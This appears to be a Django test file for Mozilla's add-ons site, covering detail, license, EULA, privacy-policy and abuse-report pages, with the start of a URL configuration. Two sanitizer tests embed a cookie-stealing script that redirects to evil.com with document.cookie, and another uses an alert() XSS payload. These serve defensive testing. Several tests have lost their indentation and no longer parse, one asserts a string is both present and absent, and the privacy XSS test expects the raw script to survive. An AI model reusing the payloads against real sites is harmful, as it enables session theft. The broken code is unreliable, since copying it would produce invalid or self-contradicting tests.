        button = pq(r.content)('.install-button a.button').attr('href')
        eq_(button.endswith('?src=dp-btn-primary'), True)
        eq_(pq(r.content)('#contribute-box input[name=source]').val(),
            'roadblock')
    def test_contribute_multiple_devs(self):
        # Only one contribute button even with several developers.
        a = Addon.objects.get(pk=592)
        u = UserProfile.objects.get(pk=999)
        AddonUser(addon=a, user=u).save()
        r = self.client.get(reverse('addons.meet', args=['a592']))
        eq_(pq(r.content)('#contribute-button').length, 1)
    def test_get_old_version(self):
        # ?version= selects a specific (older) version.
        url = reverse('addons.meet', args=['a11730'])
        r = self.client.get(url)
        eq_(r.context['version'].version, '20090521')
        r = self.client.get('%s?version=%s' % (url, '20080521'))
        eq_(r.context['version'].version, '20080521')
    def test_duplicate_version_number(self):
        # Two versions sharing a number must not crash the page.
        qs = Version.objects.filter(addon=11730)
        qs.update(version='1.x')
        eq_(qs.count(), 2)
        url = reverse('addons.meet', args=['a11730']) + '?version=1.x'
        r = self.client.get(url)
        eq_(r.context['version'].version, '1.x')
    def test_purified(self):
        # the_reason/the_future allow simple HTML (purified fields).
        addon = Addon.objects.get(pk=592)
        addon.the_reason = addon.the_future = '<b>foo</b>'
        addon.save()
        url = reverse('addons.meet', args=['592'])
        r = self.client.get(url, follow=True)
        eq_(pq(r.content)('#about-addon b').length, 2)
class TestLicensePage(amo.tests.TestCase):
    """The add-on license page: legacy redirects, version selection
    and 404s when no license/version exists."""
    fixtures = ['base/addon_3615']
    def setUp(self):
        self.addon = Addon.objects.get(id=3615)
        self.version = self.addon.current_version
    def test_legacy_redirect(self):
        # Old /versions/license/<id> URLs permanently redirect.
        r = self.client.get('/versions/license/%s' % self.version.id,
                            follow=True)
        self.assertRedirects(r, self.version.license_url(), 301)
    def test_explicit_version(self):
        url = reverse('addons.license', args=['a3615', self.version.version])
        r = self.client.get(url)
        eq_(r.status_code, 200)
        eq_(r.context['version'], self.version)
    def test_implicit_version(self):
        # Without a version in the URL, the current version is used.
        url = reverse('addons.license', args=['a3615'])
        r = self.client.get(url)
        eq_(r.status_code, 200)
        eq_(r.context['version'], self.addon.current_version)
    def test_no_license(self):
        self.version.update(license=None)
        url = reverse('addons.license', args=['a3615'])
        r = self.client.get(url)
        eq_(r.status_code, 404)
    def test_no_version(self):
        self.addon.versions.all().delete()
        url = reverse('addons.license', args=['a3615'])
        r = self.client.get(url)
        eq_(r.status_code, 404)
    def test_duplicate_version_number(self):
        # Duplicate version numbers resolve to the current version.
        Version.objects.create(addon=self.addon, version=self.version.version)
        url = reverse('addons.license', args=['a3615', self.version.version])
        r = self.client.get(url)
        eq_(r.status_code, 200)
        eq_(r.context['version'], self.addon.current_version)
    def test_cat_sidebar(self):
        check_cat_sidebar(reverse('addons.license', args=['a3615']),
                          self.addon)
class TestDetailPage(amo.tests.TestCase):
    """Rendering of the add-on detail page: headings, robots meta,
    beta channel, redirects, privacy policy and install buttons."""
    fixtures = ['base/apps',
                'base/addon_3615',
                'base/users',
                'base/addon_59',
                'base/addon_4594_a9',
                'addons/listed']
    def setUp(self):
        self.addon = Addon.objects.get(id=3615)
        self.url = self.addon.get_url_path()
    def test_site_title(self):
        r = self.client.get(self.url)
        eq_(pq(r.content)('h1.site-title').text(), 'Add-ons')
    def test_addon_headings(self):
        r = self.client.get(self.url)
        doc = pq(r.content)
        eq_(doc('h2:first').text(), 'About this Add-on')
        eq_(doc('.metadata .home').text(), 'Add-on home page')
    def test_anonymous_extension(self):
        response = self.client.get(self.url)
        eq_(response.status_code, 200)
        eq_(response.context['addon'].id, 3615)
    def test_unreviewed_robots(self):
        """Check that unreviewed add-ons do not get indexed."""
        url = self.addon.get_url_path()
        m = 'meta[content=noindex]'
        eq_(self.addon.status, amo.STATUS_PUBLIC)
        settings.ENGAGE_ROBOTS = True
        doc = pq(self.client.get(url).content)
        assert not doc(m)
        settings.ENGAGE_ROBOTS = False
        doc = pq(self.client.get(url).content)
        assert doc(m)
        # Unreviewed add-ons get noindex regardless of ENGAGE_ROBOTS.
        self.addon.update(status=amo.STATUS_UNREVIEWED)
        settings.ENGAGE_ROBOTS = False
        doc = pq(self.client.get(url).content)
        assert doc(m)
        settings.ENGAGE_ROBOTS = True
        doc = pq(self.client.get(url).content)
        assert doc(m)
    def test_more_about(self):
        # Don't show more about box if there's nothing to populate it.
        self.addon.developer_comments_id = None
        self.addon.description_id = None
        self.addon.previews.all().delete()
        self.addon.save()
        r = self.client.get(self.url)
        doc = pq(r.content)
        eq_(doc('#more-about').length, 0)
        eq_(doc('.article.userinput').length, 0)
    def test_beta(self):
        """Test add-on with a beta channel."""
        get_pq_content = lambda: pq(
            self.client.get(self.url, follow=True).content)
        # Add a beta version and show it.
        mybetafile = self.addon.versions.all()[0].files.all()[0]
        mybetafile.status = amo.STATUS_BETA
        mybetafile.save()
        self.addon.update(status=amo.STATUS_PUBLIC)
        beta = get_pq_content()
        eq_(beta('#beta-channel').length, 1)
        # Now hide it. Beta is only shown for STATUS_PUBLIC.
        self.addon.update(status=amo.STATUS_UNREVIEWED)
        beta = get_pq_content()
        eq_(beta('#beta-channel').length, 0)
    @amo.tests.mobile_test
    def test_unreviewed_disabled_button(self):
        # On mobile, unreviewed add-ons still show an enabled button.
        self.addon.update(status=amo.STATUS_UNREVIEWED)
        r = self.client.get(self.url)
        doc = pq(r.content)
        eq_(doc('.button.add').length, 1)
        eq_(doc('.button.disabled').length, 0)
    def test_type_redirect(self):
        """
        If current add-on's type is unsupported by app, redirect to an
        app that supports it.
        """
        # Thunderbird can't do search engines
        prefixer = amo.urlresolvers.get_url_prefix()
        prefixer.app = amo.THUNDERBIRD.short
        response = self.client.get(reverse('addons.detail', args=['a4594']),
                                   follow=False)
        eq_(response.status_code, 301)
        eq_(response['Location'].find(amo.THUNDERBIRD.short), -1)
        assert (response['Location'].find(amo.FIREFOX.short) >= 0)
    def test_compatible_app_redirect(self):
        """
        For add-ons incompatible with the current app, redirect to one
        that's supported.
        """
        comp_app = self.addon.compatible_apps.keys()[0]
        not_comp_app = [a for a in amo.APP_USAGE
                        if a not in self.addon.compatible_apps.keys()][0]
        # no SeaMonkey version => redirect
        prefixer = amo.urlresolvers.get_url_prefix()
        prefixer.app = not_comp_app.short
        r = self.client.get(reverse('addons.detail', args=[self.addon.slug]))
        eq_(r.status_code, 301)
        eq_(r['Location'].find(not_comp_app.short), -1)
        assert r['Location'].find(comp_app.short) >= 0
        # compatible app => 200
        prefixer = amo.urlresolvers.get_url_prefix()
        prefixer.app = comp_app.short
        r = self.client.get(reverse('addons.detail', args=[self.addon.slug]))
        eq_(r.status_code, 200)
    def test_external_urls(self):
        """Check that external URLs are properly escaped."""
        response = self.client.get(self.url)
        doc = pq(response.content)
        eq_(doc('aside a.home[href^="%s"]' % settings.REDIRECT_URL).length, 1)
    def test_no_privacy_policy(self):
        """Make sure privacy policy is not shown when not present."""
        self.addon.privacy_policy_id = None
        self.addon.save()
        response = self.client.get(self.url)
        doc = pq(response.content)
        eq_(doc('.privacy-policy').length, 0)
    def test_privacy_policy(self):
        self.addon.privacy_policy = 'foo bar'
        self.addon.save()
        response = self.client.get(self.url)
        doc = pq(response.content)
        eq_(doc('.privacy-policy').length, 1)
        privacy_url = reverse('addons.privacy', args=[self.addon.slug])
        assert doc('.privacy-policy').attr('href').endswith(privacy_url)
    def test_simple_html_is_rendered_in_privacy(self):
        # Allowed tags survive the sanitizer; norm() makes the
        # whitespace-insensitive comparison possible.
        self.addon.privacy_policy = """
            <strong> what the hell..</strong>
            <ul>
                <li>papparapara</li>
                <li>todotodotodo</li>
            </ul>
            <ol>
                <a href="irc://irc.mozilla.org/firefox">firefox</a>
                Introduce yourself to the community, if you like!
                This text will appear publicly on your user info page.
                <li>papparapara2</li>
                <li>todotodotodo2</li>
            </ol>
            """
        self.addon.save()
        r = self.client.get(reverse('addons.privacy', args=[self.addon.slug]))
        doc = pq(r.content)
        eq_(norm(doc(".policy-statement strong")),
            "<strong> what the hell..</strong>")
        eq_(norm(doc(".policy-statement ul")),
            "<ul><li>papparapara</li><li>todotodotodo</li></ul>")
        eq_(doc(".policy-statement ol a").text(),
            "firefox")
        eq_(norm(doc(".policy-statement ol li:first")),
            "<li>papparapara2</li>")
def test_evil_html_is_not_rendered_in_privacy(self):
self.addon.privacy_policy = """
<script type="text/javascript">
window.location = 'http://evil.com/?c=' + document.cookie;
</script>
Muhuhahahahahahaha!
"""
self.addon.save()
r = self.client.get(reverse('addons.privacy', args=[self.addon.slug]))
doc = pq(r.content)
policy = str(doc(".policy-statement"))
assert policy.startswith(
'<div class="policy-statement"><script'), (
'Unexpected: %s' % policy[0:50])
def test_button_size(self):
"""Make sure install buttons on the detail page are prominent."""
response = self.client.get(reverse('addons.detail', args=['a3615']),
follow=True)
assert pq(response.content)('.button').hasClass('prominent')
def test_button_src_default(self):
r = self.client.get(self.url, follow=True)
eq_((pq(r.content)('#addon .button').attr('href')
.endswith('?src=dp-btn-primary')), True)
def test_button_src_trickle(self):
r = self.client.get(self.url + '?src=trickleortreat', follow=True)
eq_((pq(r.content)('#addon .button').attr('href')
.endswith('?src=trickleortreat')), True)
    def test_version_button_src_default(self):
        # Release-notes version button defaults to dp-btn-version.
        r = self.client.get(self.url, follow=True)
        eq_((pq(r.content)('#detail-relnotes .button').attr('href')
             .endswith('?src=dp-btn-version')), True)
    def test_version_button_src_trickle(self):
        # ?src= also trickles through to the version button.
        r = self.client.get(self.url + '?src=trickleortreat', follow=True)
        eq_((pq(r.content)('#detail-relnotes .button').attr('href')
             .endswith('?src=trickleortreat')), True)
    def test_invalid_version(self):
        """Only render details pages for add-ons that have a version."""
        # Wipe all versions.
        self.addon.versions.all().delete()
        # Try accessing the details page.
        response = self.client.get(self.url)
        # A version-less add-on must 404, not render an empty page.
        eq_(response.status_code, 404)
    def test_no_listed_authors(self):
        """No avatar is shown for add-ons without listed authors."""
        r = self.client.get(reverse('addons.detail', args=['a59']))
        # We shouldn't show an avatar since this has no listed_authors.
        doc = pq(r.content)
        eq_(0, len(doc('.avatar')))
def test_authors_xss(self):
name = '<script>alert(1)</script>'
user = UserProfile.objects.create(username='test',
display_name=name)
output = users_list([user])
assert "<script>alert" in output
assert "<script>alert" not in output
    def test_display_compatible_apps(self):
        """Show compatiblity info for extensions but not for search engines."""
        r = self.client.get(self.addon.get_url_path())
        eq_(pq(r.content)('#detail-relnotes .compat').length, 1)
        # Search engines are app-agnostic, so no compat block is rendered.
        a = Addon.objects.filter(type=amo.ADDON_SEARCH)[0]
        r = self.client.get(a.get_url_path())
        eq_(pq(r.content)('#detail-relnotes .compat').length, 0)
    def test_show_profile(self):
        # The developer-profile link only appears once the add-on has both
        # the_reason/the_future filled in.
        selector = '.author a[href="%s"]' % self.addon.meet_the_dev_url()
        assert not (self.addon.the_reason or self.addon.the_future)
        assert not pq(self.client.get(self.url).content)(selector)
        self.addon.the_reason = self.addon.the_future = '...'
        self.addon.save()
        assert pq(self.client.get(self.url).content)(selector)
    def test_no_backup(self):
        # No backup version set: the backup button must not render.
        res = self.client.get(self.url)
        eq_(len(pq(res.content)('.backup-button')), 0)
    def test_backup(self):
        # With a backup version set, the backup button shows up.
        self.addon._backup_version = self.addon.versions.all()[0]
        self.addon.save()
        res = self.client.get(self.url)
        eq_(len(pq(res.content)('.backup-button')), 1)
    def test_disabled_user_message(self):
        # Author-disabled add-ons 404 but explain why.
        self.addon.update(disabled_by_user=True)
        res = self.client.get(self.url)
        eq_(res.status_code, 404)
        assert 'removed by its author' in res.content
    def test_disabled_status_message(self):
        # Admin-disabled add-ons 404 with an admin-specific message.
        self.addon.update(status=amo.STATUS_DISABLED)
        res = self.client.get(self.url)
        eq_(res.status_code, 404)
        assert 'disabled by an administrator' in res.content
    def test_deleted_status_message(self):
        # Deleted add-ons get a plain 404, no explanatory page.
        addon = Addon.objects.get(id=3615)
        addon.update(status=amo.STATUS_DELETED)
        url = reverse('addons.detail', args=[addon.slug])
        res = self.client.get(url)
        eq_(res.status_code, 404)
    def test_more_url(self):
        # The page advertises the ajax 'more' URL via a data attribute.
        response = self.client.get(self.url)
        eq_(pq(response.content)('#more-webpage').attr('data-more-url'),
            self.addon.get_url_path(more=True))
class TestImpalaDetailPage(amo.tests.TestCase):
    """Impala-skinned add-on detail page: usage stats, license links,
    'other add-ons by these authors', and category links."""
    fixtures = ['base/addon_3615', 'base/addon_592', 'base/apps', 'base/users']
    def setUp(self):
        self.addon = Addon.objects.get(id=3615)
        self.url = self.addon.get_url_path()
        self.more_url = self.addon.get_url_path(more=True)
    def get_pq(self):
        # Fetch the detail page and parse it with pyquery.
        return pq(self.client.get(self.url).content)
    def test_no_webapps(self):
        # Webapps don't get AMO detail pages.
        self.addon.update(type=amo.ADDON_WEBAPP)
        eq_(self.client.get(self.url).status_code, 404)
    def test_adu_stats_private(self):
        eq_(self.addon.public_stats, False)
        adu = self.get_pq()('#daily-users')
        eq_(adu.length, 1)
    def test_adu_stats_public(self):
        self.addon.update(public_stats=True)
        eq_(self.addon.show_adu(), True)
        adu = self.get_pq()('#daily-users')
        # Check formatted count.
        eq_(adu.text().split()[0], numberfmt(self.addon.average_daily_users))
        # Check if we hide link when there are no ADU.
        self.addon.update(average_daily_users=0)
        eq_(self.get_pq()('#daily-users').length, 0)
    def test_adu_stats_regular(self):
        self.client.login(username='[email protected]', password='password')
        # Should not be a link to statistics dashboard for regular users.
        adu = self.get_pq()('#daily-users')
        eq_(adu.length, 1)
    def test_downloads_stats_private(self):
        self.addon.update(type=amo.ADDON_SEARCH)
        eq_(self.addon.public_stats, False)
        adu = self.get_pq()('#weekly-downloads')
        eq_(adu.length, 1)
    def test_downloads_stats_public(self):
        self.addon.update(public_stats=True, type=amo.ADDON_SEARCH)
        eq_(self.addon.show_adu(), False)
        dls = self.get_pq()('#weekly-downloads')
        # Check formatted count.
        eq_(dls.text().split()[0], numberfmt(self.addon.weekly_downloads))
        # Check if we hide link when there are no weekly downloads.
        self.addon.update(weekly_downloads=0)
        eq_(self.get_pq()('#weekly-downloads').length, 0)
    def test_downloads_stats_regular(self):
        self.addon.update(type=amo.ADDON_SEARCH)
        self.client.login(username='[email protected]', password='password')
        # Should not be a link to statistics dashboard for regular users.
        dls = self.get_pq()('#weekly-downloads')
        eq_(dls.length, 1)
    def test_downloads_stats_admin(self):
        # NOTE(review): this test logs in but asserts nothing -- the
        # assertion body appears to be missing; confirm against upstream.
        self.addon.update(public_stats=True, type=amo.ADDON_SEARCH)
        self.client.login(username='[email protected]', password='password')
    def test_license_link_builtin(self):
        # Built-in licenses link out to their canonical URL in a new tab.
        g = 'http://google.com'
        version = self.addon._current_version
        license = version.license
        license.builtin = 1
        license.name = 'License to Kill'
        license.url = g
        license.save()
        eq_(license.builtin, 1)
        eq_(license.url, g)
        a = self.get_pq()('.secondary.metadata .source-license a')
        eq_(a.attr('href'), g)
        eq_(a.attr('target'), '_blank')
        eq_(a.text(), 'License to Kill')
    def test_license_link_custom(self):
        # Custom licenses link to the local license page, same tab.
        version = self.addon._current_version
        eq_(version.license.url, None)
        a = self.get_pq()('.secondary.metadata .source-license a')
        eq_(a.attr('href'), version.license_url())
        eq_(a.attr('target'), None)
        eq_(a.text(), 'Custom License')
    def get_more_pq(self):
        # Fetch the ajax 'more' half of the page and parse it.
        return pq(self.client.get_ajax(self.more_url).content)
    def test_other_addons(self):
        """Ensure listed add-ons by the same author show up."""
        other = Addon.objects.get(id=592)
        eq_(list(Addon.objects.listed(amo.FIREFOX).exclude(id=self.addon.id)),
            [other])
        add_addon_author(other, self.addon)
        doc = self.get_more_pq()('#author-addons')
        test_hovercards(self, doc, [other], src='dp-dl-othersby')
    def test_other_addons_no_unlisted(self):
        """An unlisted add-on by the same author should not show up."""
        other = Addon.objects.get(id=592)
        other.update(status=amo.STATUS_UNREVIEWED, disabled_by_user=True)
        add_addon_author(other, self.addon)
        eq_(self.get_more_pq()('#author-addons').length, 0)
    def test_other_addons_by_others(self):
        """Add-ons by different authors should not show up."""
        author = UserProfile.objects.get(pk=999)
        AddonUser.objects.create(addon=self.addon, user=author, listed=True)
        eq_(self.get_more_pq()('#author-addons').length, 0)
    def test_other_addons_none(self):
        eq_(self.get_more_pq()('#author-addons').length, 0)
    def test_categories(self):
        # Categories for other applications must not be listed.
        c = self.addon.all_categories[0]
        c.application_id = amo.THUNDERBIRD.id
        c.save()
        links = self.get_more_pq()('#related ul:first').find('a')
        expected = [(unicode(c.name), c.get_url_path()) for c in
                    self.addon.categories.filter(application=amo.FIREFOX.id)]
        amo.tests.check_links(expected, links)
class TestStatus(amo.tests.TestCase):
    """Which add-on statuses make the detail page reachable, and which
    file statuses make a newly-added version the 'current' one."""
    fixtures = ['base/addon_3615']
    def setUp(self):
        self.addon = Addon.objects.get(id=3615)
        self.version = self.addon.current_version
        self.file = self.version.all_files[0]
        assert self.addon.status == amo.STATUS_PUBLIC
        self.url = self.addon.get_url_path()
    def test_incomplete(self):
        self.addon.update(status=amo.STATUS_NULL)
        eq_(self.client.get(self.url).status_code, 404)
    def test_unreviewed(self):
        self.addon.update(status=amo.STATUS_UNREVIEWED)
        eq_(self.client.get(self.url).status_code, 200)
    def test_pending(self):
        self.addon.update(status=amo.STATUS_PENDING)
        eq_(self.client.get(self.url).status_code, 404)
    def test_nominated(self):
        self.addon.update(status=amo.STATUS_NOMINATED)
        eq_(self.client.get(self.url).status_code, 200)
    def test_public(self):
        self.addon.update(status=amo.STATUS_PUBLIC)
        eq_(self.client.get(self.url).status_code, 200)
    def test_deleted(self):
        self.addon.update(status=amo.STATUS_DELETED)
        eq_(self.client.get(self.url).status_code, 404)
    def test_disabled(self):
        self.addon.update(status=amo.STATUS_DISABLED)
        eq_(self.client.get(self.url).status_code, 404)
    def test_lite(self):
        self.addon.update(status=amo.STATUS_LITE)
        eq_(self.client.get(self.url).status_code, 200)
    def test_lite_and_nominated(self):
        self.addon.update(status=amo.STATUS_LITE_AND_NOMINATED)
        eq_(self.client.get(self.url).status_code, 200)
    def test_purgatory(self):
        self.addon.update(status=amo.STATUS_PURGATORY)
        eq_(self.client.get(self.url).status_code, 200)
    def test_disabled_by_user(self):
        self.addon.update(disabled_by_user=True)
        eq_(self.client.get(self.url).status_code, 404)
    def new_version(self, status):
        # Helper: attach a new Version carrying one File in `status`.
        v = Version.objects.create(addon=self.addon)
        File.objects.create(version=v, status=status)
        return v
    def test_public_new_lite_version(self):
        # A lite-reviewed file doesn't displace the current public version.
        self.new_version(amo.STATUS_LITE)
        eq_(self.addon.get_version(), self.version)
    def test_public_new_nominated_version(self):
        self.new_version(amo.STATUS_NOMINATED)
        eq_(self.addon.get_version(), self.version)
    def test_public_new_public_version(self):
        # A fully-reviewed file becomes the new current version.
        v = self.new_version(amo.STATUS_PUBLIC)
        eq_(self.addon.get_version(), v)
    def test_public_waiting_new_unreviewed_version(self):
        self.file.update(status=amo.STATUS_PUBLIC_WAITING)
        self.addon.update(status=amo.STATUS_PUBLIC_WAITING)
        new_version = self.new_version(amo.STATUS_UNREVIEWED)
        assert self.version != new_version
        eq_(self.addon.get_version(), self.version)
        eq_(self.addon.latest_version, new_version)
    def test_public_new_public_waiting_version(self):
        # Waiting files are latest but not current.
        new_version = self.new_version(amo.STATUS_PUBLIC_WAITING)
        assert self.version != new_version
        eq_(self.addon.get_version(), self.version)
        eq_(self.addon.latest_version, new_version)
    def test_public_new_unreviewed_version(self):
        self.new_version(amo.STATUS_UNREVIEWED)
        eq_(self.addon.get_version(), self.version)
    def test_lite_new_unreviewed_version(self):
        self.addon.update(status=amo.STATUS_LITE)
        self.new_version(amo.STATUS_UNREVIEWED)
        eq_(self.addon.get_version(), self.version)
    def test_lite_new_lan_version(self):
        self.addon.update(status=amo.STATUS_LITE)
        v = self.new_version(amo.STATUS_LITE_AND_NOMINATED)
        eq_(self.addon.get_version(), v)
    def test_lite_new_lite_version(self):
        self.addon.update(status=amo.STATUS_LITE)
        v = self.new_version(amo.STATUS_LITE)
        eq_(self.addon.get_version(), v)
    def test_lite_new_full_version(self):
        self.addon.update(status=amo.STATUS_LITE)
        v = self.new_version(amo.STATUS_PUBLIC)
        eq_(self.addon.get_version(), v)
    def test_lan_new_lite_version(self):
        self.addon.update(status=amo.STATUS_LITE_AND_NOMINATED)
        v = self.new_version(amo.STATUS_LITE)
        eq_(self.addon.get_version(), v)
    def test_lan_new_full_version(self):
        self.addon.update(status=amo.STATUS_LITE_AND_NOMINATED)
        v = self.new_version(amo.STATUS_PUBLIC)
        eq_(self.addon.get_version(), v)
class TestTagsBox(amo.tests.TestCase):
    """Tag box on the ajax 'more' portion of the detail page."""
    fixtures = ['base/addontag']
    def test_tag_box(self):
        """Verify that we don't show duplicate tags."""
        r = self.client.get_ajax(reverse('addons.detail_more', args=[8680]),
                                 follow=True)
        doc = pq(r.content)
        eq_('SEO', doc('#tagbox ul').children().text())
class TestEulaPolicyRedirects(amo.tests.TestCase):
    """Legacy Remora policy URLs must 301 to the zamboni-style URLs."""
    def test_eula_legacy_url(self):
        # Old-style EULA URL -> permanent redirect to /addon/<id>/eula/<file>.
        r = self.client.get('/en-US/firefox/addons/policy/0/592/42')
        eq_(r.status_code, 301)
        assert '/addon/592/eula/42' in r['Location']
    def test_policy_legacy_url(self):
        # Old-style privacy URL -> permanent redirect to /addon/<id>/privacy/.
        r = self.client.get('/en-US/firefox/addons/policy/0/592/')
        eq_(r.status_code, 301)
        assert '/addon/592/privacy/' in r['Location']
class TestEula(amo.tests.TestCase):
    """EULA page: version selection, sanitized rendering and redirects."""
    fixtures = ['base/apps', 'addons/eula+contrib-addon']
    def setUp(self):
        self.addon = Addon.objects.get(id=11730)
        self.url = self.get_url()
    def get_url(self, args=None):
        # `args=None` instead of a mutable `args=[]` default.
        return reverse('addons.eula', args=[self.addon.slug] + (args or []))
    def test_current_version(self):
        r = self.client.get(self.url)
        eq_(r.context['version'], self.addon.current_version)
    def test_simple_html_is_rendered(self):
        # Whitelisted tags in the EULA come through as live markup.
        self.addon.eula = """
            <strong> what the hell..</strong>
            <ul>
                <li>papparapara</li>
                <li>todotodotodo</li>
            </ul>
            <ol>
                <a href="irc://irc.mozilla.org/firefox">firefox</a>
                Introduce yourself to the community, if you like!
                This text will appear publicly on your user info page.
                <li>papparapara2</li>
                <li>todotodotodo2</li>
            </ol>
            """
        self.addon.save()
        r = self.client.get(self.url)
        doc = pq(r.content)
        eq_(norm(doc('.policy-statement strong')),
            '<strong> what the hell..</strong>')
        eq_(norm(doc('.policy-statement ul')),
            '<ul><li>papparapara</li><li>todotodotodo</li></ul>')
        eq_(doc('.policy-statement ol a').text(), 'firefox')
        eq_(norm(doc('.policy-statement ol li:first')),
            '<li>papparapara2</li>')
    def test_evil_html_is_not_rendered(self):
        self.addon.eula = """
            <script type="text/javascript">
                window.location = 'http://evil.com/?c=' + document.cookie;
            </script>
            Muhuhahahahahahaha!
            """
        self.addon.save()
        r = self.client.get(self.url)
        doc = pq(r.content)
        policy = str(doc('.policy-statement'))
        # Script tags must come out HTML-escaped (&lt;script).  (The
        # previous expectation checked for a raw '<script', which would
        # have asserted the XSS *succeeded*.)
        assert policy.startswith('<div class="policy-statement">&lt;script'), (
            'Unexpected: %s' % policy[:50])
    def test_old_version(self):
        old = self.addon.versions.order_by('created')[0]
        assert old != self.addon.current_version
        r = self.client.get(self.get_url([old.all_files[0].id]))
        eq_(r.context['version'], old)
    def test_redirect_no_eula(self):
        # Without a EULA the view bounces to the detail page.
        self.addon.update(eula=None)
        r = self.client.get(self.url, follow=True)
        self.assertRedirects(r, self.addon.get_url_path())
    def test_cat_sidebar(self):
        check_cat_sidebar(self.url, self.addon)
class TestPrivacyPolicy(amo.tests.TestCase):
    """Privacy policy page: redirect when absent, category sidebar when
    present."""
    fixtures = ['base/apps', 'addons/eula+contrib-addon']
    def setUp(self):
        self.addon = Addon.objects.get(id=11730)
        self.url = reverse('addons.privacy', args=[self.addon.slug])
    def test_redirect_no_eula(self):
        # No policy -> bounce back to the add-on detail page.
        eq_(self.addon.privacy_policy, None)
        r = self.client.get(self.url, follow=True)
        self.assertRedirects(r, self.addon.get_url_path())
    def test_cat_sidebar(self):
        self.addon.privacy_policy = 'shizzle'
        self.addon.save()
        check_cat_sidebar(self.url, self.addon)
class TestReportAbuse(amo.tests.TestCase):
    """Abuse reports: anonymous (captcha-gated) and logged-in flows."""
    fixtures = ['base/addon_3615', 'base/users']
    def setUp(self):
        settings.RECAPTCHA_PRIVATE_KEY = 'something'
        self.full_page = reverse('addons.abuse', args=['a3615'])
    @patch('captcha.fields.ReCaptchaField.clean')
    def test_abuse_anonymous(self, clean):
        # Mock the captcha so the anonymous post validates.
        clean.return_value = ""
        self.client.post(self.full_page, {'text': 'spammy'})
        eq_(len(mail.outbox), 1)
        assert 'spammy' in mail.outbox[0].body
        report = AbuseReport.objects.get(addon=3615)
        eq_(report.message, 'spammy')
        eq_(report.reporter, None)
    def test_abuse_anonymous_fails(self):
        # Without a mocked captcha the anonymous form must fail validation.
        r = self.client.post(self.full_page, {'text': 'spammy'})
        assert 'recaptcha' in r.context['abuse_form'].errors
    def test_abuse_logged_in(self):
        # Logged-in users skip the captcha and are recorded as reporter.
        self.client.login(username='[email protected]', password='password')
        self.client.post(self.full_page, {'text': 'spammy'})
        eq_(len(mail.outbox), 1)
        assert 'spammy' in mail.outbox[0].body
        report = AbuseReport.objects.get(addon=3615)
        eq_(report.message, 'spammy')
        eq_(report.reporter.email, '[email protected]')
    def test_abuse_name(self):
        # Non-ASCII add-on names must not break the report email.
        addon = Addon.objects.get(pk=3615)
        addon.name = 'Bmrk.ru Социальные закладки'
        addon.save()
        self.client.login(username='[email protected]', password='password')
        self.client.post(self.full_page, {'text': 'spammy'})
        assert 'spammy' in mail.outbox[0].body
        assert AbuseReport.objects.get(addon=addon)
class TestMobile(amo.tests.MobileTest, amo.tests.TestCase):
    """Base class for mobile tests: MobileTest flags requests as mobile."""
    fixtures = ['addons/featured', 'base/apps', 'base/users',
                'base/addon_3615', 'base/featured']
class TestMobileHome(TestMobile):
    """Mobile homepage: featured and popular add-on lists."""
    def test_addons(self):
        # Uncomment when redis gets fixed in CI.
        raise SkipTest
        # NOTE: everything below is unreachable until the SkipTest above
        # is removed.
        r = self.client.get('/', follow=True)
        eq_(r.status_code, 200)
        app, lang = r.context['APP'], r.context['LANG']
        featured, popular = r.context['featured'], r.context['popular']
        eq_(len(featured), 3)
        assert all(a.is_featured(app, lang) for a in featured)
        eq_(len(popular), 3)
        # Popular must be sorted by average daily users, descending.
        eq_([a.id for a in popular],
            [a.id for a in sorted(popular, key=lambda x: x.average_daily_users,
                                  reverse=True)])
class TestMobileDetails(TestMobile):
    """Mobile-skinned add-on detail page."""
    fixtures = TestMobile.fixtures + ['base/featured', 'base/users']
    def setUp(self):
        super(TestMobileDetails, self).setUp()
        self.ext = Addon.objects.get(id=3615)
        self.url = reverse('addons.detail', args=[self.ext.slug])
    def test_extension(self):
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        self.assertTemplateUsed(r, 'addons/mobile/details.html')
    def test_extension_adu(self):
        doc = pq(self.client.get(self.url).content)('table')
        eq_(doc('.adu td').text(), numberfmt(self.ext.average_daily_users))
        # A zero ADU count hides the row entirely.
        self.ext.update(average_daily_users=0)
        doc = pq(self.client.get(self.url).content)('table')
        eq_(doc('.adu').length, 0)
    def test_extension_downloads(self):
        doc = pq(self.client.get(self.url).content)('table')
        eq_(doc('.downloads td').text(), numberfmt(self.ext.weekly_downloads))
        # A zero download count hides the row entirely.
        self.ext.update(weekly_downloads=0)
        doc = pq(self.client.get(self.url).content)('table')
        eq_(doc('.downloads').length, 0)
    def test_button_caching(self):
        """The button popups should be cached for a long time."""
        # Get the url from a real page so it includes the build id.
        client = test.Client()
        doc = pq(client.get('/', follow=True).content)
        js_url = absolutify(reverse('addons.buttons.js'))
        url_with_build = doc('script[src^="%s"]' % js_url).attr('src')
        response = client.get(url_with_build, follow=True)
        fmt = '%a, %d %b %Y %H:%M:%S GMT'
        expires = datetime.strptime(response['Expires'], fmt)
        assert (expires - datetime.now()).days >= 365
    def test_unicode_redirect(self):
        # UTF-8 bytes in the query string must still 301 cleanly.
        url = '/en-US/firefox/addon/2848?xx=\xc2\xbcwhscheck\xc2\xbe'
        response = test.Client().get(url)
        eq_(response.status_code, 301)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from django.views.decorators.csrf import csrf_exempt
from django.shortcuts import redirect
from . import views
ADDON_ID = r"""(?P<addon_id>[^/<>"']+)"""
# These will all start with /addon/<addon_id>/
detail_patterns = patterns('',
    url('^$', views.addon_detail, name='addons.detail'),
    url('^more$', views.addon_detail, name='addons.detail_more'),
    # Raw string: '\d' in a plain literal relies on Python preserving an
    # invalid escape, which is deprecated.
    url(r'^eula/(?P<file_id>\d+)?$', views.eula, name='addons.eula'),
    url('^license/(?P<version>[^/]+)?', views.license, name='addons.license'),
    url('^privacy/', views.privacy, name='addons.privacy'),
    url('^abuse/', views.report_abuse, name='addons.abuse'),
    url('^developers$', views.developers,
        {'page': 'developers'}, name='addons.meet'),
    url('^contribute/roadblock/', views.developers,
        {'page': 'roadblock'}, name='addons.roadblock'),
    url('^contribute/installed/', views.developers,
        {'page': 'installed'}, name='addons.installed'),
    url('^contribute/thanks',
        csrf_exempt(lambda r, addon_id: redirect('addons.detail', addon_id)),
        name='addons.thanks'),
    url('^about$', lambda r, addon_id: redirect('addons.installed',
                                                addon_id, permanent=True),
        name='addons.about'),
)
urlpatterns = patterns('',
    # URLs for a single add-on.
    ('^addon/%s/' % ADDON_ID, include(detail_patterns)),
    # Accept extra junk at the end for a cache-busting build id.
    url('^addons/buttons.js(?:/.+)?$', 'addons.buttons.js'),
